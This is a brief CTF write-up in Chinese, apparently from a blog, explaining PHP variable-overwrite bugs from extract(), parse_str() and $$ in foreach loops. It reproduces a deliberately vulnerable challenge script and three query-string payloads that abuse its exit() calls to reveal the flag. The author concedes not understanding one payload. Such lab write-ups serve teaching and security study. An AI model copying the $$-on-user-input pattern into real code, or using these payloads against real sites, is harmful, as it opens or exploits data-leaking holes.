【无标题】

知识点：
$$变量覆盖漏洞

变量覆盖漏洞详解_poggioxay的博客-CSDN博客_变量覆盖漏洞

参考，意思就是说，存在一些函数比如exit（）extract()函数使用不当，parse_str()函数使用不当，import_request_variables()使用不当，包含了变量，如果get传参等方式就会覆盖之前的变量，达到控制变量而读取flag；诸如出现echo xxx .$flag

$$特殊符号

1. 不仅仅是函数会导致变量覆盖，有些特殊符号的特殊搭配也会引起变量覆盖漏洞，比如$$。

2. $$ 导致的变量覆盖问题在CTF代码审计题目中经常在foreach中出现，如以下的示例代码，使用foreach来遍历数组中的值，然后再将获取到的数组键名作为变量，数组中的值作为变量的值，因此就产生了变量覆盖漏洞。请求?name=test 会将$name的值覆盖，变为test。

比如这道题的代码如下：

 index.php最后的代码：

<?php

include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}



echo "the flag is: ".$flag;

可以通过构造三个exit（）的其中一个来实现达到读取flag

第一个：?handsome=flag&flag=b&b=flag

不是很理解；

第二个最简单：

直接?yds=flag

第三个：

?flag=flag&is=flag